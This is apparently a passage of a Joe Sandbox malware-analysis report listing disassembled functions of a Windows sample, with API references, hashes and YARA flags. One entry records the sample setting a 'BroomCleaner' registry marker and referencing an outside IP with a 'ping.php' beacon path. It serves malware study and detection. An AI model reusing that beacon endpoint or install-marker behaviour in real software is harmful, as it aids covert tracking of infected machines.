                                                                                                                                                                                                                                  • Opcode ID: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
                                                                                                                                                                                                                                  • Instruction ID: 26764a85889f0707fbffed2f2a276afb84307330fa482a04e449b3980190c86e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C51D4B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFD04D6280DB38DC80C6A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 7da7e4f938cfb7f53f4ee3042c9ba99eb24c12608d8937e14d039355d897170d
                                                                                                                                                                                                                                  • Instruction ID: 68ef0a4baed83bf313a212b59b327df333dc31b97233ae496646a1f671aa2022
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7da7e4f938cfb7f53f4ee3042c9ba99eb24c12608d8937e14d039355d897170d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A61B171900205AFDB20DF65C841BEABBF4EF48710F1441BBED44EB252E734AD868B98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 16879e562c41d271cc16cff151e7cbd4d44b0ffa200e9325e312bb0433d02818
                                                                                                                                                                                                                                  • Instruction ID: 33f826b8fa5ae3ca5756e30b56d824f5193f327fa4160b0c7b8091a776c511d0
• Opcode Fuzzy Hash: 16879e562c41d271cc16cff151e7cbd4d44b0ffa200e9325e312bb0433d02818
• Instruction Fuzzy Hash: 03618175E04205AFDB20DFA8C841BAABFB6FB44710F2441EDE945EB240DB70B9418B98
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
• __fassign.LIBCMT ref: 00415AD0
• __fassign.LIBCMT ref: 00415AEB
• WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
• WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
• WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
• Instruction ID: 97884a52693caeb5a5c3a9d5f4bc50bcec63f9a7d6aba0d10f38b6cf3ce1f43d
• Opcode Fuzzy Hash: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
• Instruction Fuzzy Hash: C051F1B1A05608DFDB10CFA8D881BEEBBF4EF49310F14416BE955E3291D774A981CB68
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,05BC63EF,?,?,?,?,?,?), ref: 05BC5CBC
• __fassign.LIBCMT ref: 05BC5D37
• __fassign.LIBCMT ref: 05BC5D52
• WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 05BC5D78
• WriteFile.KERNEL32(?,?,00000000,05BC63EF,00000000,?,?,?,?,?,?,?,?,?,05BC63EF,?), ref: 05BC5D97
• WriteFile.KERNEL32(?,?,00000001,05BC63EF,00000000,?,?,?,?,?,?,?,?,?,05BC63EF,?), ref: 05BC5DD0
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: cb6d35f48d1bebdfaee63c5326d5eda48187afe5479d9753ca614cb5bfedeae6
• Instruction ID: f8d10c082c9d563c1c4a590532fa4933080b9f5f499c78a9b174a70a0d19b4be
• Opcode Fuzzy Hash: cb6d35f48d1bebdfaee63c5326d5eda48187afe5479d9753ca614cb5bfedeae6
• Instruction Fuzzy Hash: E751B4B1A002459FDB20CFA8D885AEEBBF4FF09310F1541AEE551E7291D730B951CBA8
Uniqueness

Uniqueness Score: -1.00%

APIs
• _ValidateLocalCookies.LIBCMT ref: 0040C7DB
• ___except_validate_context_record.LIBVCRUNTIME ref: 0040C7E3
• _ValidateLocalCookies.LIBCMT ref: 0040C871
• __IsNonwritableInCurrentImage.LIBCMT ref: 0040C89C
• _ValidateLocalCookies.LIBCMT ref: 0040C8F1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
• Instruction ID: 4609d27efc8d7a17fa762f128460d8fd5adcc0840ed3b149ea1d44a8c589526f
• Opcode Fuzzy Hash: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
• Instruction Fuzzy Hash: 7F418235E00208DBCB10EF69C880A9EBBB5AF45315F14C27BE8156B3D1D7399945CB99
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 05BB141C
• std::_Lockit::_Lockit.LIBCPMT ref: 05BB142E
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 05BB146B
  • Part of subcall function 05BB80E1: _Yarn.LIBCPMT ref: 05BB8100
  • Part of subcall function 05BB80E1: _Yarn.LIBCPMT ref: 05BB8124
• std::bad_exception::bad_exception.LIBCMT ref: 05BB148C
• __CxxThrowException@8.LIBVCRUNTIME ref: 05BB149A
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 05BB14BD
• std::_Lockit::~_Lockit.LIBCPMT ref: 05BB152E
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
• String ID:
• API String ID: 835844855-0
• Opcode ID: 7b966b326459ba2342e1ffa8f210576540c6bcc155a50cbc91a1a0f115c5258d
• Instruction ID: 7ab42959e2922bd9d3102909e4dd7abd9a9702abadc79208c78c01772f7ed0fa
• Opcode Fuzzy Hash: 7b966b326459ba2342e1ffa8f210576540c6bcc155a50cbc91a1a0f115c5258d
• Instruction Fuzzy Hash: 62315071904B04DFD735AF19D8446AEFBF4FF58610B208AAFE09A92A40C7F4B605CB59
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 05BD639B
• RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043CE50,SOFTWARE\BroomCleaner), ref: 05BD63C3
• RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043CE50,0043CE51,Installed,Installed), ref: 05BD6446
• RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 05BD6467
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: CloseCreateH_prologValue
• String ID: Installed$SOFTWARE\BroomCleaner
• API String ID: 1996196666-529226407
• Opcode ID: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
• Instruction ID: 20e0d18a3fbbcf614562ed2df69df1664f628db786c53828484d37569577b17b
• Opcode Fuzzy Hash: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
• Instruction Fuzzy Hash: 9D317A71A00219EFDF159FA8DC94AFEBB79FB48254F04416DE802B3151D7B26D05CB60
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fc80b842ec2fa87e1f3d7b13bcdad74e1acd085aed55d4be6a2af7e8e8dba1d6
• Instruction ID: eb3437e7256d6e9500263c5b78cb76159e7e032ed684a14598ba9abdd6a69119
• Opcode Fuzzy Hash: fc80b842ec2fa87e1f3d7b13bcdad74e1acd085aed55d4be6a2af7e8e8dba1d6
• Instruction Fuzzy Hash: 85112BB27081297FDB202F739D04AAF3A5CDF85734B51022EBC15D6241DEBC88818669
Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041F123: _free.LIBCMT ref: 0041F14C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F42A
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F435
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F440
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F494
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F49F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F4AA
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F4B5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                  • Instruction ID: 6442e121d4515539895166ad143442a8d84c52f7901faf26133e6203624009ae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79113D71540B14FADA20BBF2DC07FCB77DCAF4470CF40482EBA9A66052DA7DB9894654
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 05BCF38A: _free.LIBCMT ref: 05BCF3B3
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF691
                                                                                                                                                                                                                                    • Part of subcall function 05BC6501: HeapFree.KERNEL32(00000000,00000000,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?), ref: 05BC6517
                                                                                                                                                                                                                                    • Part of subcall function 05BC6501: GetLastError.KERNEL32(?,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?,?), ref: 05BC6529
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF69C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF6A7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF6FB
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF706
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF711
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF71C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                  • Instruction ID: 5fd74a128af271ce6769ea0295eca42b4ab77c9daf396fc07cbd32ed7b74d3b8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1112472A40708BADF34BBB0CC49FDB7F9EAF48740F4048DEA69A66050DA69F5044A65
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040418E
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 004041B4
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 004041BD
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 004041EE
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040422A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1202896665-0
                                                                                                                                                                                                                                  • Opcode ID: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                  • Instruction ID: 0d98e69d0512f29499375b1b223a36d4520ec3994eac90c636b6988e9ad91f04
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7311C472A041249BCB04EBA5DC46AEE7B74EF84358F10457FF911B72D1DB38AA01C7A9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004033EF
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 00403415
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0040341E
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040344F
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040348B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1202896665-0
                                                                                                                                                                                                                                  • Opcode ID: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                  • Instruction ID: b08fc69a2d58a520d61ed45628bf7838f6025f71e81aad9ede0327bacf9a49bc
• Opcode Fuzzy Hash: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
• Instruction Fuzzy Hash: 8F11B2329002249BCB05EFA4C845AEE7B74EF84319F10457EF811772D1DB789A00CB99
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 004035FA
• std::_Lockit::_Lockit.LIBCPMT ref: 00403609
• int.LIBCPMT ref: 00403620
  • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
  • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
• std::locale::_Getfacet.LIBCPMT ref: 00403629
• std::_Facet_Register.LIBCPMT ref: 0040365A
• std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
• __CxxThrowException@8.LIBVCRUNTIME ref: 00403696
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
• String ID:
• API String ID: 1202896665-0
• Opcode ID: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
• Instruction ID: 35ba7fbacb3ba011adbce412d2c2d1e287e189574cae76d7885ddda8e317074f
• Opcode Fuzzy Hash: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
• Instruction Fuzzy Hash: 3F11C432A001289BCB14EFA5C845AEE7B74AF84319F10457FF811773D1DB389A04CB99
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,05BC6BF7,00000001,00000001,?), ref: 05BC6A00
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,05BC6BF7,00000001,00000001,?,?,?,?), ref: 05BC6A86
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 05BC6B80
• __freea.LIBCMT ref: 05BC6B8D
  • Part of subcall function 05BC7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05BC7CDE
• __freea.LIBCMT ref: 05BC6B96
• __freea.LIBCMT ref: 05BC6BBB
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 5aa362d34f2587ad585337770af062121dfa53fa41768fff83d20bcf48d2f1bc
• Instruction ID: cdbe3e59393565e7d053ea3b5a4f60c6da86ab791faf412beef69446a884c00d
• Opcode Fuzzy Hash: 5aa362d34f2587ad585337770af062121dfa53fa41768fff83d20bcf48d2f1bc
• Instruction Fuzzy Hash: 3951C072700216ABEB258F68CC46EBB7BAAEF44750F1542EDFD15DA140DB74FC4086A8
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: d20e9699dbc1971cb5a568552f769a18d013c3a1758ac9be0fb612f4fcf7e9e2
• Instruction ID: 718bfb1be64fddbb13d287cf5bb67825c1c0e481ba6d94f2ea4f00e94f797b17
• Opcode Fuzzy Hash: d20e9699dbc1971cb5a568552f769a18d013c3a1758ac9be0fb612f4fcf7e9e2
• Instruction Fuzzy Hash: 5851FB32504205ABDF249B598C41EEF77A9AF49364F10421FF915962A1FB3DE9C0C66C
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: 2ddc8343f9251e146c752777cf7602817e468c0d1f081b9786246e2890976293
• Instruction ID: bec095b346298e50ef4f3a58bacf30205b5ce342eeaa2781dfdcc58f02d76f12
• Opcode Fuzzy Hash: 2ddc8343f9251e146c752777cf7602817e468c0d1f081b9786246e2890976293
• Instruction Fuzzy Hash: 8B51C532A04605ABDB249F6C8C85EBE7FA9EF49361F1042DDE816E6192DB31F501C66C
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,0040C9AC,0040A25B), ref: 0040C9C3
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D1
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9EA
• SetLastError.KERNEL32(00000000,?,0040C9AC,0040A25B), ref: 0040CA3C
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 9ec8e2a5af9cecc2b331547669bdca73f67e442984506367ed98352285f45261
• Instruction ID: 4d2dab335d40ef71c1f126db0958835d547db160ba3e5df8986dc94b5f1501a5
• Opcode Fuzzy Hash: 9ec8e2a5af9cecc2b331547669bdca73f67e442984506367ed98352285f45261
• Instruction Fuzzy Hash: 5001C072609619AEE63857B5BCC5B2B3665DB01378720033FF220B02F1EF694C06558C
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,05BBCC13,05BBA4C2), ref: 05BBCC2A
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 05BBCC38
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 05BBCC51
• SetLastError.KERNEL32(00000000,?,05BBCC13,05BBA4C2), ref: 05BBCCA3
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 0582111726bc4582c636df92e8fe045c6ff17bb16724062b7f54ac71f9743851
• Instruction ID: f291e6eedfc3d54a71cfa04fc498d2b6041e4010ff95eface944d9f8d665408c
• Opcode Fuzzy Hash: 0582111726bc4582c636df92e8fe045c6ff17bb16724062b7f54ac71f9743851
• Instruction Fuzzy Hash: EC01D8323097265EB7246675BD8CBBB3F55EB2167472002BDF228950F0EFE66C0141C8
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                  • Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                  • Instruction ID: ed1cfbe94671cc1e241a5e305b234748cf7dab698c9013e935629a888f8688e1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
